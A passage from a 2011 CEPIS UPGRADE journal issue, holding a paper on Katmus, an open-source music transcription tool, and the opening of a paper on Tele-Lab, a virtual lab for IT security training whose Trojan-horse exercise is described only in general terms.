This paper will be published, in Spanish, by Novática. Novática <http://www.ati.es/novatica>, a founding member of UPENET, is
a bimonthly journal published by the Spanish CEPIS society ATI (Asociación de Técnicos de Informática – Association of Computer
Professionals).
In recent years, computers have become an essential part of music production. Thus, versatile music composition software
which is well mapped to the underlying process of producing music is essential to the professional and novice practitioner
alike. The demand for computer music software covers the full spectrum of music production tasks, including software for
synthesizers, notation editors, digital audio sequencers, automatic transcription, accompaniment, and educational use.
Since different music composition tasks are quite diverse, there is no single application that is well suited to all application
domains and so each application has a particular focus. In this paper, we describe a novel software package, called
Katmus, whose design philosophy accurately captures the specific manual process of transcribing complex musical passages from audio to musical scores. A novel concept, introduced within Katmus, is the synchronization between the audio
waveform and the notation editor, intimately linking the time segments of the music recording to be transcribed to the
measures of the sheet music score. Together with playback, frequency domain analysis of the input signal and a complete
project management system for handling multiple scores per audio file, this system greatly aids the manual transcription
process and represents a unique contribution to the present music software toolset.
Keywords: Education, Katmus,
Music Transcriptions, Open Source
Software, Teaching Resources.
1 Introduction and Motivation
Just as books and texts capture
thoughts and human speech, musical
notation provides a written representation of a complex musical performance. While only approximately perfect, this notational system, in its modern incarnation, provides not only a
representation of the full set of notes
and their durations, but also key signatures, rhythm, dynamic range (volume), and a set of ornamental symbols
for expressing suggested performance
queues and articulations, using a complex system of symbols [1].
Within the scope of this paper,
musical transcription can be defined as
the act of listening to a melody (or polyphony arrangement) and translating
it into its corresponding musical notation, consisting of the set of notes with
their duration with respect to the in-
© CEPIS
Authors
Orlando García-Feal was born in
Spain. He obtained an engineering
degree in 2008 from the ESEI, Universidad de Vigo, Spain. Since 2008, he has
worked at the Environmental Physics
Laboratory (Universidad de Vigo), building, maintaining, and writing software
for their large-scale cluster computing
facility. He is presently pursuing his
Ph.D degree in Computer Science. His
research interests include the study of
musical signal processing and cluster
computing. <[email protected]>
Silvana Gómez-Meire holds a PhD
from the Universidad de Vigo, Spain.
She was born in Ourense, Spain, in 1972.
She works as full-time lecturer in the
Computer Science Department of the
Universidad de Vigo, collaborating as a
researcher with the research group SING
(New Generation Computer Systems)
belonging to the Universidad de Vigo.
Regarding her field of research, she has
worked on topics related to audio signal
analysis and music transcription soft-
Farewell Edition
ware development, although at present
she is centred on the study of hybrid
methods of Artificial Intelligence and
their application to real problems.
<[email protected]>
David Olivieri was born in the USA.
He received his BSc, MSc and PhD
degrees in Physics (1996) from the
University of Massachusetts, Amherst
(USA). From 1993-1996 he was a doctoral fellow at the Fermi National
Accelerator Laboratory (Batavia, IL,
USA) studying accelerator physics.
From 1996-1999 he was a staff engineer
at Digital Equipment Corporation for the
Alpha Microprocessor product line.
Since 1999, he has been an Associate
Professor at the Universidad de Vigo, in
the School of Computer Engineering
(Spain). He has publications in pure and
applied physics, computer science, audio
signal processing, and bioinformatics.
His present research interests focus on
signal processing and applications
in sound, images and videos.
<[email protected]>
CEPIS UPGRADE Vol. XII, No. 5, December 2011 135
UPENET
Figure 1: Relationship between an Audio Segment and its corresponding Musical Notation.
ferred time signature and rhythm [2].
Given this definition, Figure 1 shows
a short audio signal waveform segment, where different measures with
corresponding notes have been identified from the well defined beats or
rhythm extracted from the signal. This
schematic mapping from the audio signal to the musical notation is referred
to as musical transcription.
In the field of music analysis [3],
the automatic transcription of monophonic melodies has been widely studied [4] and essentially is considered to
be a solved problem. Although more
sophisticated machine learning based
methods may be applied, simple algorithms for extracting monophonic
melodies based on peak-tracking techniques [5] have been shown to be quite
effective. This success, however, is not
true for the general polyphonic music
transcription problem [6]. Indeed, even
for the case of a single polyphony instrument such as the piano, automatic
transcription methods still perform
poorly. For the more general polyphony case, consisting of several different instruments (for example in an
orchestra) recorded in the same channel, it is far beyond the capabilities of
present transcription systems or, at
best, success is limited to special cases.
Thus, while automatic transcription
may help in certain situations, manual
transcription remains the gold standard for music practitioners wishing to
document their own performances or
transcribe performances of others. This
136
traditional manual transcription, however, is a time intensive task that
strongly depends on the training, musical knowledge, and experience of the
person undertaking the process. Indeed, transcription consist of an iterative process: listening to (and normally
repeating) short time segments of an
audio recording, transcribing the notes
in this segments, and then moving on
to the next short segment, and often returning to transcribed sections in order to qualitatively evaluate the overall consistency. For those not possessing nearly perfect musical memory and
pitch this involves tedious and repetitive
interaction with the input audio signal as
well as some music notation editor.
While not directly providing automatic transcription, several software
tools exist whose purpose is to assist
the task of transcription. Some of these
tools, such as Noteedit [7], focus more
upon facilitating a notational
WYSIWYG editor and provide no
tools for directly interacting with the
audio signal while transcribing. Other
systems, such as Transcribe [8], provide direct frequency analysis from the
segments of the time domain audio signal, thereby indicating fundamental
tones, yet offer no facilities for simultaneously writing the musical score.
“
Motivated by the shortcomings of
presently available software in this
domain, the work described in this paper grew out of the need to create a
new software application that could aid
the process of transcribing music from
recorded digital music that would
merge the strengths of editing software
and those of audio signal analysis. The
novelty of our software application and
fundamental design criteria is based on
the inter-reaction between the notation
editor and the audio signal being
analyzed, which we directly linked in
time. For the user, the present working
measure in the note editor is highlighted in a different color on the rendered audio waveform to show this
direct correspondence. Not only does
this provide for an intuitive user experience, but it really helps transcription,
since the user always knows which part
of the audio signal corresponds to parts
that have been transcribed and which
to those parts that are yet to be transcribed.
2 State of the Art
As described in the previous section, other music transcription software
is focused either on music score editing or on the implementation of different analysis tools, but not both together.
In recent years, computers have become
an essential part of music production
CEPIS UPGRADE Vol. XII, No. 5, December 2011
”
Farewell Edition
© CEPIS
UPENET
“
In this paper, we describe a software package, called Katmus,
whose design allows transcribing complex musical passages
from audio to musical scores
”
There are currently many software solutions, both commercial and open
source, for music notation editing, and
they are often presented in the context
of a much larger and more encompassing computer music tools suite. However, software applications in the particular domain of automatic music transcription have only modest success and
lack many features to make them useful to the music practitioner. Since the
number of computer music software
and applications domains is large and
beyond the scope of this paper, we provide a brief review of software that we
consider to be forerunners to Katmus,
for the specific purpose of aiding
manual music transcription. Thus, following an analysis of these applications, we provide a comparative table
summarizing the features of each that
are of interest for this task.
Sibelius [9] is a commercial music
editing software that is both popular
and easy to use. It supports playback
of complete polyphony arrangements
by using backend instrument synthesis with the use of standard sound fonts,
and the basic functionality can be extended through the use of plugin libraries. The Sibelius suite provides a wide
array of tools, useful for both the experienced musician as well as the amateur. Moreover, several features are
also useful for teaching through functions that allow for the creation of lessons. However, it is not directly designed for manual transcription and
does not provide any facilities for frequency analysis or connection with an
external audio file.
Finale [10] is another proprietary
software tool which is quite complete
and widely used by musicians. Like
Sibelius, it does not provide the ability to simultaneously interact with the
time-domain signal and the notion editor at the same time, nor does it provide frequency analysis of the time© CEPIS
domain signal. It is exclusively geared
towards the high quality publication of
sheet music scores.
Noteedit [7] is an open source software application that provides similar
functionality as its commercial counterparts, just described, for editing
scores, as well as saving and exporting midi files. The application is a hybrid between a full sequencer and a
simple notation editor in that it requires
a real time audio server (Jack on Linux)
to provide a patchbay input/output for
midi based instruments, that can interface directly with the notation editor.
However, for the purpose of transcribing music, this application does not
provide useful tools that link the audio
file with the editor, nor does it provide
the ability for project management.
Rosegarden [11] is a more general
purpose open source audio workstation
software that provides audio and MIDI
sequencing, in the same way as Noteedit,
and also provides notation editing. It is
focused on providing a wide range of
complex audio sequencing functionality
and interaction with MIDI inputs found
in high end commercial computer music
suites. For compositional purposes,
Rosegarden contains a complete music score editor which can be connected
to MIDI input devices; however,
Rosegarden does not have specific facilities for manual transcription.
Transcribe [8] is a software tool
specifically designed for aiding manual
music transcription. The application
supports different audio file formats
and provides a graphical interface for
the input audio waveform and corresponding frequency analysis. The main
window consists of an active piano
keyboard with note synthesis so that a
user can compare the tone of a synthesized note with that in the input audio
signal. The main window also contains
the rendered audio waveform and a
plot of the frequency domain is superposed on the scale of the piano keyboard so that the peaks in frequency
are centered on the corresponding
notes of the piano keyboard. Another
useful feature of Transcribe is the ability to replay small segments as well as
change speed without sacrificing the
tone, called time-warping.
With its intuitive design, Transcribe
is a lightweight program useful for
monophonic melodies, yet practically
useless for polyphonic music. Another
shortcoming of this tool for more serious transcription tasks is that it does
not provide a notation integrated editor that collects the results of the frequency analysis, nor is it possible to
add extensions and the software is not
open source, so it cannot be extended
to include new features.
Like the previous tool, TwelveKeys
[12] is a proprietary software tool that
provides analysis of monophonic and
polyphonic music recordings in order
to identify notes through the display
of the frequency analysis of short time
domain segments of the audio file.
“
Musical transcription can be defined
as the act of listening to a melody,
or polyphony arrangement,
and translating it into its corresponding
musical notation
Farewell Edition
”
CEPIS UPGRADE Vol. XII, No. 5, December 2011 137
UPENET
Once again, there is no provision for
annotation of the notes identified, so
external editing software must be used.
AudioScore [13] is another commercial transcription tool that displays
the signal in the time domain together
with the frequency domain analysis for
note identification. This software does
provide an editing environment but, as
with all the other software tools described, the audio file is not directly
linked to the notation editor, so the user
does not know which time domain segment corresponds to a particular measure in the score.
Thus, despite the wide array of software tools for music composition and
transcription described, we believe that
there is a well defined conceptual gap
in the way software tools have approached the problem of transcribing
musical pieces, since they ignore the
manner in which transcription is normally accomplished. We believe the
key concept for a useful transcription
software tool is to provide an explicit
correspondence between the time
Table 1: Comparison of Relevant Software Tools
138
CEPIS UPGRADE Vol. XII, No. 5, December 2011
Farewell Edition
© CEPIS
UPENET
Figure 2: Main Window Workspace in Katmus.
points in audio input waveform with
the associated measures in the sheet
music score. Our open source software
tool, Katmus [14], bridges this gap.
Moreover, Katmus not only combines
time-frequency analysis of the audio
waveform with a powerful WYSIWYG
score editor, but also introduces a
project based workflow in the process
of music transcription. In the Katmus
environment, having synchronization
between the audio waveform and the
note editor means that updates to the
score have a corresponding update to
the state of the associated time segment
of the waveform. In particular, the state
of being transcribed or not is represented on the rendered waveform as a
color-coded highlight. Thus, an incom-
“
© CEPIS
plete measure in the note editor is represented on the corresponding segment of
the waveform with a different color from
a measure that is completely transcribed.
Another important difference between Katmus and other similar software is our emphasis on a project management workflow approach. In this
way, a user can save Katmus sessions,
thereby saving the present state of all
parameters in XML format. With this
state persistence, a user can return at a
later time to an unfinished transcription and continue at the point of the
last session with all the previous parameters restored. Thus, there is no
reason for the transcription to proceed
in a linear order; large sections can be
left untranscribed to be returned to at
a later time. Sections that are complex
can be marked as unfinished, indicating to the user that these are points
which must be revised and/or require
further effort. Project creation in
Katmus is flexible, allowing for multiple scores per audio file, as well as
selecting scores based upon single or
multiple staves. As with other full feature notation editors, Katmus provides
score playback with sound synthesis
support and allows for exporting scores
to PDF or MIDI (Musical Instrument
Digital Interface).
Perhaps one of the most powerful
software architecture features is the
plugin management infrastructure,
which allows for smaller software
modules to be hot-plugged without the
There are currently many software solutions,
both commercial and open source,
for music notation editing
”
Farewell Edition
CEPIS UPGRADE Vol. XII, No. 5, December 2011 139
UPENET
Figure 3: Typical Workflow in Katmus.
need for recompilation of the entire
application. This has the advantage that
experimental audio analysis and other
additional features can be inserted
without affecting the underlying software kernel of the application. Several
modules have been written using this
plugin system, including the timestretching features found in other similar tools, frequency spectral analysis
and filters, and experimental automatic
transcription that can provide suggestions to the user. In this way, Katmus
can act as a powerful workbench for
researchers developing different audio
applications related to musical analysis.
Table 1 shows a comparative summary of the different tools that have
been described in this section, includ-
ing the most relevant parameters for the
specific task of transcription.
Table 1 provides a comparison
which helps describe the advantages of
Katmus, our application for musical
transcription, showing strengths and
weaknesses of other applications with
respect to this problem domain.
3 Environmental Features of
Katmus
As described in the previous section, the novel aspect of Katmus is the
tailored workflow for helping users
transcribe complex musical compositions. This workflow consists of project
management, and a graphical interface
that exposes a WYSIWYG notation
editor coupled to a graphical representation of the time domain signal of the
audio signal. Also integral to this
graphical interface is the ability to listen and apply various analysis algorithms to transcribe the musical arrangement, displaying at all times the
correspondence between what is written, where it appears in the audio signal and score, and playback.
Figure 2 shows the main window
of the Katmus application. The top
panel displays the representation of the
frequency domain audio signal, the
middle panel the time domain signal,
and the bottom panel is the corresponding score. The representation in the frequency domain helps to identify the
notes present in the audio segment. In
the plot representing the audio waveform, it is possible to manually mark
the limits of the measures, thus link-
“
Katmus is a software platform
designed to help musicians, professionals, teachers and students
with complex music transcription tasks
140
CEPIS UPGRADE Vol. XII, No. 5, December 2011
”
Farewell Edition
© CEPIS
UPENET
Usage Case
Open
P
r
o
j
e
c
t
Close
Create
Save
Delete
Export
S
c
o
r
e
New
Rename
Playback
Delete
Copy
Cut
Insert
N
o
t
e
s
Paste
Select
Background
Sequence of Events
Request opening an existing Katmus project 1. If the source file is correct, the application
should properly load the project with all
that contains different scores containing
source elements.
various notes, chords, ties and other stylistic
symbols, and/or an audio file with format 2. If the source file has errors, the application
should display a dialog box indicating that
wav, mp3 and/or ogg. This project may not
the file is corrupt or not found.
contain errors, be corrupt or have
associated audio files.
A request is made to close a project.
1. Confirms or cancels the closure of a project.
2. Asks the user whether to open or create a
new project.
A request is made to create a new project.
1. This opens the project creation wizard.
2. Features are introduced into the new
project.
3. The option is available to return and update
previously entered element values.
4. Loading an invalid file will display an error
message.
Create a new score in the project with 1. The project is saved with the original
elements and the updated score.
different elements (time signature, notes,
2. If the project has been previously saved, the
and other symbols).
name can be changed.
A score can be selected and removed from 1. It shows the dialog box for confirmation and
the project tree.
removal.
2. If cancelled, the process is aborted.
3. If the score is the only one associated with
the project, it cannot be removed.
The user wants to export a score to be 1. The user can choose the format in which to
rendered.
export the score.
2. If the file exists, it can be overwritten.
The user wants to add a new score to the 1. A dialog box is displayed for confirmation.
project.
2. The name and score type is entered.
The user wants to change the name of a 1. The score is selected from the project tree.
score in the project.
2. The rename option is chosen and the new
name entered.
3. If confirmed, the score is renamed,
otherwise the current name is retained.
The user wants to play back a selected 1. An instrument is chosen.
score.
2. The score is reproduced with the chosen
instrument.
3. The user can choose the same controls as
with the reproduction of the audio signal.
The user selects one or more notes of a 1. The selected notes are deleted.
measure, or several measures, to be
deleted.
All selected notes are copied and pasted
The user wants to select one or more notes 1.
into the desired measures.
of a measure, or several measures, to be
copied to another measure.
The user wants to select one or more notes 1. The cut notes are removed and pasted in
the desired measure.
of a measure, or several measures, to be cut
and pasted into another measure.
The user wants to select a note or a stylistic 1. If the score does not have any measures,
symbol to be inserted in the score.
then nothing happens.
2. If measures exist, the selected elements are
inserted into the desired measure.
The user wants to paste one or more notes 1. An empty space is selected and the notes
previously copied.
are copied.
2. If the user tries to paste over an existing note
or outside the present measure, then the
process is aborted.
The user wants to select one or more notes 1. The user selects the note and the
in one or more measures.
background color changes.
2. If an empty zone is pressed, the present
selection is undone.
3. Selection of multiple notes is performed by
selecting the first and dragging the cursor to
the last note desired.
4. All notes of a measure or pentagram are
selected by selecting an empty zone prior
to notes desired and dragging the cursor to
Table 2.Tests based upon Scenarios.
© CEPIS
Farewell Edition
CEPIS UPGRADE Vol. XII, No. 5, December 2011 141
UPENET
ing the original signal with the note
editor.
The application can import audio
files that can be played and will be used
for analysis during the transcription
process. The interface also allows you
to incorporate Katmus imported audio
files corresponding to transcriptions in
the form of scores. The major features
that Katmus provides the user with are
the following:
„ Import and associate an audio
file to be transcribed within the project.
Several audio file formats are supported, including uncompressed wav,
mp3 and ogg vorbis.
„ Associate different transcriptions to the same audio file within a
single project. This feature allows the
user to save and maintain several transcriptions of the same audio file or to
have individual transcriptions for different instruments.
„ Zoom capability in both the audio waveform and notation editor,
which allows the positioning of precise selections of audio segments for
fast musical passages.
„ Synchronization of the audio
waveform with the measures in the
score, thereby associating each audio
segment with a compass. Combined
with a color coding, this provides a
powerful functional advantage since
completed and uncompleted parts of
the audio file and/or score are indicated, saved and restored for multi-session work.
„ Playback of the audio signal.
The user can replay the entire signal
or certain segments, selected by dragging the mouse over the graphical representation of the audio signal. A powerful feature for transcription is pitch
invariant time-stretching, where time
domain segments can be slowed down
without effecting the pitch. This feature is especially interesting for rapid
musical segments or in cases where
complicated chords (polyphony) need
to be resolved.
„ Edit scores. The integrated notation editor provides basic functionality
for the editing of musical symbols.
„ Play back the score. This functionality makes it possible to compare
142
the original melody with the tune of
the current work.
„ Export scores. Supporting formats are PDF, MIDI, Lilypond, SVG
or PNG.
4 System Description and
Technical Specifications
One of the fundamental aspects of
the Katmus development and philosophy has been the use of open source
software for its implementation,
thereby encouraging future contributions from a wider community of developers. The application is written in
C++ and makes extensive use of the
open source Qt4 graphical interface
“
The novel aspect
of Katmus is the tailored workflow for
helping users transcribe complex musical compositions
”
library (originally developed by
Trolltech and now owned by Nokia).
The significant advantages of the Qt4
library are that it is cross-platform,
object-oriented, and provides extensive
technical documentation.
Since Qt provides a complete framework for developing applications, the
core capabilities and functionality of
Katmus rely heavily upon the standard
and advanced features of the library.
Some noteworthy features provided by
Qt in the Katmus application are: (i) the
use of the Plugin Manager API for developing shared modules, which extends
the basic functionality of an application
and encourage third party contributions
and experimentation, (ii) the use of the
specialized Qt thread classes, which can
greatly accelerate the applications performance on computer architectures that
can take advantage of multi-threading,
(iii) the use of interoperability with the
use of XML document exchange through
standard SAX and DOM technology, and
(iv) a clean implementation of object
CEPIS UPGRADE Vol. XII, No. 5, December 2011
event callback handling with the use of
the signals and slots paradigm, characteristic of the Qt framework.
Project management in Katmus is
implemented with the use of XML
through a DOM implementation offered explicitly in the Qt4 library. In
order to produce high quality score rendering, scores are exported using a
Lilypond based file generator [15]
which produces the specific language
syntax for post-processing by the
Lilypond compiler that produces the
desired output format (PS, PDF or
MIDI). Within the application, the audio signal is played by invoking the
libao library [16]. This library is crossplatform and provides a simple API for
audio playback that can be used internally or through different standard audio drivers such as ALSA or OSS.
Playback of scores is done with the use
of the Lilypond syntax generator to
generate MIDI files and uses Timidity++ [17] for sound synthesis. The
slow motion playback is programmed
using the Rubberband library [18],
which implements a phase-vocoder
that can change the speed of original
musical audio in real time without affecting the pitch. Finally, to obtain the
frequency domain from the time domain of the audio signal, the popular
open source Fourier transform library,
fftw3 [19], is used.
Figure 3 shows the typical workflow
of Katmus, which is a standalone application with a complete user interface. The
first action when launching the application is either to create a new a project,
select an existing project saved on disk,
or start a default project by directly importing an audio file.
Since many different options can
be used to instantiate a new project, a
graphical wizard guides the user
through the process of creating a new
project. The information queried during this process includes: (i) the type
of audio file to be imported, (ii) the
channel (if stereo), (iii) the type of
score (one or two staves) and (iv) the
name of the project. Once the project
is successfully created, the standard
work area of the application is instantiated, which consists of three discrete
parts, shown in Figure 2, and described
Farewell Edition
© CEPIS
UPENET
as follows:
1. Display window for audio signal: Provides zoom capability to
change both the time as well as amplitude scale of the audio waveform,
which is an important feature for transcription. Thus, the user can focus upon
short time scale segments of the audio
waveform. An important feature is the
ability to select the time intervals corresponding to the different measures
of the score, which are marked in the
display window by vertical lines. Since
there can be variability of time meters
within a musical composition, Katmus
offers two different ways of making the
correspondence between measures and
the times in the audio signal: (i) manual
selecting the limits of each measure in
the signal display window by mouse
point/click events, or (ii) assigning a
constant time duration for all measures,
and then making small tweaks to the
duration of individual measures where
necessary. The user may also interacts
with the waveform display window by
selecting small segments with mouse
drag events. In this way, all the points
included in the selected waveform segment can be used for subsequent analysis with built-in functions, plugin functions, or repetitive playbacks.
2. Intelligent Score Editor: Once
the measures and the time signature are
defined, the user can insert the various
musical notes and symbols corresponding to the transcription. An important
feature of the editor is that the time
computation is automatically validated
so that only measures with the correct
time signature can be marked as complete.
3. Project tree: Displays the different elements, such as scores, measures and audio file, which are part of
the complete transcription project. As
described previously, an advantage of
the project paradigm is that it provides
an intuitive way of allowing Katmus
to contain many transcription scores
for a single audio file, thereby containing different versions of a transcription
or assigning different musical instruments to each separate score.
In order to ensure the proper functioning of the system described and the
quality of the software, several evalu-
© CEPIS
“
Katmus is available at SourceForge
since July 2009. Since then, hundreds of
users have successfully downloaded and
installed the application
”
ation tests were performed. There are
numerous methods of evaluation in the
literature that ensure the quality of software development based upon the
product type and metrics [20]. For
Katmus, both functional and structural
tests were performed focusing specifically on object-oriented systems.
The method chosen for these tests
is based upon scenarios, since it focuses upon actions that the user performs in order to discover interaction
errors. This means that tasks performed
by users must be captured in a series
of user cases and any possible variants
which may arise. Tests are then performed on this set of cases.
Table 2 shows set of tests based on
usage scenarios of the application.
Applying each of these scenarios to the
Katmus software system resulted in a
thorough method for debugging the
application.
Functional, or black box testing,
was applied to the user interface for
testing usage cases. The evaluation was
based on informal handling tests following the evaluation cycle of the interface [21] during which users evaluated beta versions of the software in
order to provide informal feedback for
debugging the final design.
Once extensive usage tests and bug
fixes were performed, Katmus was
made available to the wider user community at SourceForge in July 2009.
Since then, hundreds of users have successfully downloaded and installed the
application without significant incidence.
5 Conclusions and future work
This paper presents the architecture, implementation, and philosophy
of Katmus, which is an easy to use software platform designed to help musicians, professionals, teachers and stu-
Farewell Edition
dents with complex music transcription
tasks. For the expert musician, the
Katmus philosophy and implementation provides a natural mapping of the
transcription process which is a great
aid to producing the final arrangement.
For the more novice users, Katmus provides facilities that reinforce the recognition of musical notes and chords
and may serve as an educational tool.
The end result is open source transcription software that is both intuitive
and easy to use. Moreover, the application is easily extendible with the use
of a plugin architecture that simplifies
the addition of enhancements or experimental algorithms. By taking advantage of open source philosophy,
future code enhancements and extendible modules could be provided by
community contributions in the following areas:
„ Extending the capabilities of the
notation editor.
„ Using beat detection algorithms
for accurately associating measures.
„ Extending the support for
sequencing MIDI to handle more complex polyphony output.
„ Extending the labeling system
for measures.
„ Providing support for multi
channel audio analysis.
„ Module development for audio
signal editing.
References
[1] R. Bennett. Elementos básicos de
la música. Ed. Jorge Zahar, 1998.
[2] K.D. Martin. Automatic transcription of simple polyphonic music:
a robust front end processing.
MIT Media Laboratory Perceptual Computing Section. Technical Report No. 385, 1996.
[3] M. Pizczalski. A computational
model of music transcription.
CEPIS UPGRADE Vol. XII, No. 5, December 2011 143
UPENET
PhD. Thesis, University of Michigan, Ann Arbor, 1986.
[4] A. Sterian. Model based segmentation of time-frequency images
for musical transcription. PhD.
Thesis, University of Michigan,
1999.
[5] W. Hess. Pitch determination of
speech signals. Springer-Verlang,
New York, 1983.
[6] A. Klapuri and M. Davy. Signal
processing methods for music
transcription, Springer cop., New
York, 2006. doi=10.1.1.1.4071
[7] Notedit. <http:// noteedit.berlios.
de/>.
[8] Transcribe. <http:// www.seven
thstring.com/>.
[9] Sibelius. <http://www.sibelius.
com>.
[10] Finale. <http://www.finalemusic.
com/>.
[11] Rosegarden. <http:// www.rose
gardenmusic.com/>.
[12] Twelvekeys. <http:// twelvekeys.
softonic.com/>.
[13] Audioscore. <http:// www. neuratron.
com/audioscore.htm>.
[14] Katmus. <http:// katmus. source
forge.net/>.
[15] Lilypond. <http://www.cs.wisc.
edu/condor/>.
[16] Libao. <http:// www.xiph.org/ao/>.
[17] Timidity++. <http:// timidity.
sourceforge.net/>.
[18] Rubberband. <http://www. breakfast
quay.com/rubber band/>.
[19] Fftw3. <http://www.fftw.org/>.
[20] A. R. Hevner, S. T. March, J. Park,
S. Ram. Design Science in Information Systems Research Management Information Systems
Quarterly, Vol. 28 No. 1, 2004
[21] R.S. Pressman. Software Engineering: A Practitioner’s Approach. McGraw Hill, 6th edition,
2006.
144
CEPIS UPGRADE Vol. XII, No. 5, December 2011
Farewell Edition
© CEPIS
UPENET
IT Security
Practical IT Security Education with Tele-Lab
Christian Willems, Orestis Tringides, and Christoph Meine
© 2011 Pliroforiki
This paper was first published, in English, by Pliroforiki (issue no. 21, July 2011, pp. 30-38). Pliroforiki, ("Informatics" in
Greek), a founding member of UPENET, is a journal published, in Greek or English, by the Cyprus CEPIS society CCS (Cyprus
Computer Society, <http://www.ccs.org.cy/about/>) . The July 2011 issue is available at <http://www.pliroforiki.org/>.
The rapid burst of Internet usage and the corresponding growth of security risks and online attacks for the everyday user
or the enterprise employee have emerged the terms Awareness Creation and Information Security Culture. Nevertheless,
security education has remained widely an academic issue. Teaching system security or network security on the basis of
practical experience inherits a great challenge for the teaching environment, which is traditionally solved using a computer laboratory at a university campus. The Tele-Lab project offers a system for hands-on IT security training in a remote
virtual lab environment – on the web, accessible at any time.
Keywords: Information Security,
IT Security Training, Online Attacks,
Security Risks, Tele-Lab Project, Virtual Lab Environment.
Introduction
Increasing propagation of complex
IT systems and rapid growth of the
Internet more and more draws attention to the importance of IT security
issues. Technical security solutions
cannot completely overcome the lacking awareness of computer users,
caused by indifference or laziness, inattentiveness, and lack of knowledge
and education. In the context of awareness creation, IT security training has
become a topic of strong interest – as
well as for companies as for individuals.
Traditional techniques of teaching
(i.e. lectures or literature) have turned
out to be not suitable for IT security
training, because the trainee cannot
apply the principles from the academic
approach to a realistic environment
within the class. In IT security training, gaining practical experience
through exercises is indispensable for
consolidating the knowledge. Precisely
Authors
Christian Willems studied computer
science at the University of Trier,
Germany, and received his diploma
degree in 2006. Currently he is research
assistant at the Hasso-Plattner-Institute
for IT Systems Engineering, giving
courses on internet technologies and
security. Besides that he is working on
his PhD thesis at the chair of Prof. Dr.
Christoph Meinel. His special research
interests focus on Awareness Creation,
IT security teaching and virtualization
technology. <christian.willems@
hpi.uni-potsdam.de>
Science, an M.Sc. degree in Information
Systems and is currently pursuing an
MBA degree. He also participates in
Civil Society projects and is interested
in elderly care, historical remembrance,
soft tourism and social inclusion.
<[email protected]>
Orestis Tringides is the Managing Director of Amalgama Information
Management and has participated in
research projects since 2003 in the areas
of e-learning, e-business, ICT Security
and the Right of Access to Information.
He holds a B.Sc. degree in Computer
Christoph Meinel is scientific director and CEO of the Hasso-PlattnerInstitute for IT Systems Engineering
and professor for computer science at
the University of Potsdam, Germany.
His research field is Internet and Web
Technologies and Systems. Prof. Dr.
Meinel is author or co-author of 10 text
books and monographs and of various
conference proceedings. He has published
more than 350 per-reviewed scientific
papers in highly recognised international
scientific journals and conferences.
<[email protected]>
the allocation of an environment for
these practical exercises poses a challenge for research and development.
That is, because students need privileged access rights (root/administrator
account) on the training system to per-
form most of the perceivable security
exercises. With these privileges, students could easily destroy a training
system or even use it for unintended,
illegal attacks on other hosts within the
campus network or on the Internet.
“
Security education has remained widely an academic issue
© CEPIS
Farewell Edition
”
CEPIS UPGRADE Vol. XII, No. 5, December 2011 145
UPENET
Figure 1: Screenshot of the Tele-Lab Tutoring Interface
The classical approach requires a
dedicated computer lab for IT security
training. Such labs are exposed to a
number of drawbacks: they are immobile, expensive to purchase and maintain and must be isolated from all other
networks on the site. Of course, students are not allowed to have Internet
access on the lab computers. Handson exercises on network security topics even demand to provide more than
one machine to each student, which
have to be interconnected (i.e. a Manin-the-Middle attack needs three computers: one for the attacker and two
other machines as victims).
“
146
Teleteaching for security education
mostly consists of multimedia
courseware or demonstration software,
which do not offer real practical exercises. In simulation systems users do
have a kind of hands-on experience,
but a simulator doesn’t behave like a
realistic environment and the simulation of complex systems is very difficult – especially when it comes to interacting hosts on a network. The TeleLab project builds on a different approach for a Web-based teleteaching system (explained in detail in section 2).
Furthermore, we will describe a set
of exercise scenarios to illustrate the
capabilities of the Tele-Lab training environment: a simple learning unit on
password security, an exercise on
eavesdropping, and the practical application of a Man-in-the-Middle attack.
Tele-Lab: A Remote Virtual Security Laboratory
Tele-Lab, accessible at <http://
www.tele-lab.org>, was first proposed
as a standalone system [4], later enhanced to a live DVD system introducing virtual machines for the hands-on
training [3], and then emerged to the
Tele-Lab server [2, 6]. The Tele-Lab
server provides a novel e-learning sys-
In IT security training, gaining practical experience through
exercises is indispensable for consolidating the knowledge
CEPIS UPGRADE Vol. XII, No. 5, December 2011
Farewell Edition
”
© CEPIS
UPENET
“
The classical approach requires a
dedicated computer lab for IT security training
tem for practical security training in the
WWW and inherits all positive characteristics from offline security labs.
It basically consists of a web-based
system (see Fig. 1) and a training environment built of virtual machines.
The tutoring system provides learning
units with three types of content: information chapters, introductions to
security- and hacker tools and finally
practical exercises. Students perform
those exercises on virtual machines
(VM) on the server, which they operate via remote desktop access. A virtual machine is a software system that
provides a runtime environment for
operating systems. Such softwareemulated computer systems allow easy
deployment and recovery in case of
failure. Tele-Lab uses this feature to
revert the virtual machines to the original state after each usage. This is a significant advantage over the traditional
setting of a physical dedicated lab,
since the recovery to the original state
can be performed quicker, more often
and without any manual maintenance
efforts.
With the release of the current TeleLab 2.0, the platform introduced the
dynamic assignment of several virtual
machines to a single user at the same
time. Those machines are connected
within a virtual network (known as
team, see also in [1]) providing the
possibility to perform complex network attacks such as Man-in-the-Middle or interaction with a virtual
(scripted) victim (see exemplary description of a learning unit below).
A short overview of the Tele-Lab
architecture is given later in this section.
A Learning Unit in Tele-Lab
An exemplary Tele-Lab learning
unit on malware (described in more
detail in [5]) starts off with academic
”
knowledge such as definition, classification, and history of malware
(worms, viruses, and Trojan horses).
Methods to avoid becoming a victim
and relevant software solutions against
malware (e.g. scanners, firewalls) are
also presented. Afterwards, various existing malware kits and ways for distribution are described in order to prepare the hands-on exercise. Following
an offensive teaching approach1 , the
user is asked to take the attacker’s perspective – and hence is able to lively
experience possible threats to his/her
personal security objectives, as if
physical live systems were used. The
closing exercise for this learning unit
on malware is to plant a Trojan horse
on a scripted victim called Alice – in
particular, the Trojan horse is the out-
1
See [9] for different teaching approaches.
Figure 2: Architecture of the Tele-Lab Platform.
© CEPIS
Farewell Edition
CEPIS UPGRADE Vol. XII, No. 5, December 2011 147
UPENET
“
The Tele-Lab project builds on
a different approach for a
Web-based teleteaching system
dated Back Orifice 2 . In order to
achieve that, the student has to prepare
a carrier for the BO server component
and send it to Alice via e-mail. The
script on the victim VM will reply by
sending back an e-mail,indicating that
the Trojan horse server has been installed (that the e-mail attachment has
been opened by the victim). The student can now use the BO client to take
control of the victim’s system and spy
out some private information. The
knowledge of that information is the
user’s proof to the Tele-Lab tutoring
environment, that the exercise has been
successfully solved.
Such an exercise implies the need
for the Tele-Lab user to be provided
with a team of interconnected virtual
machines: one for attacking (with all
necessary tools pre-installed), a mail
server for e-mail exchange with the
victim and a vulnerable victim system
(in this particular case, an unpatched
Windows 95/98). Remote Desktop
Access is only possible to the attacker’s VM.
Learning units are also available on
